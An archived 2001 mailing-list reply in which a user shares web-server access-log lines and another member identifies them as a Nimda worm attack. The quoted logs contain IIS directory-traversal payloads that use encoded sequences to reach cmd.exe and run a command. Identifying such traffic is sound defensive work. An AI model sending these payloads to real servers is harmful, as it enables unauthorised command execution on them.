Re: [cobalt-users] access log weird stuff. hacker or virus

["Federico Voges" <ftc@xxxxxxxxxx>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


That should be a Nimda worm attack :)

On Fri, 28 Sep 2001 00:45:41 -0400, brain_damaged wrote:

>Hello,
>I went and check my access log and see this stuff.
>Looking for winnt on a linux system ?
>
>
> tail access
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /_me
>m_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302
>280 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /msa
>dc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/c
>md.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
>ipts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
>ipts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"

<SNIP>
Bye!!!
					FTC.
ftc@xxxxxxxxxx
http://www.shadowsun.com.ar/~fvoges

- ---------------------------------------------------------------------------
  Alles hat eine ende, aber ein Wurst hat zwie.
- ---------------------------------------------------------------------------

- -----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GCS/IT/O d- s+ a- C++>+++ UL+++>++++$ P+ L++>+++$ E--- W+++$ N o? K? w-- O++ M>+++$ V--
PS PE Y+ PGP+ t+ 5 X+ R+ tv+ b+ !DI D G e h! r% y?
- ------END GEEK CODE BLOCK------

PGP Public Key Fingerprint: A536 4595 EB6F D197  FBC1 5C3A 145C 2516

-----BEGIN PGP SIGNATURE-----
Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies.

iQA/AwUBO7QRGhRcJRaVKt4XEQIklgCaA1mNlpX6Vli7dMMN0ylE28QI/rMAoJrU
A+64+VESFbEC1BjgIBKsCyUA
=tzVr
-----END PGP SIGNATURE-----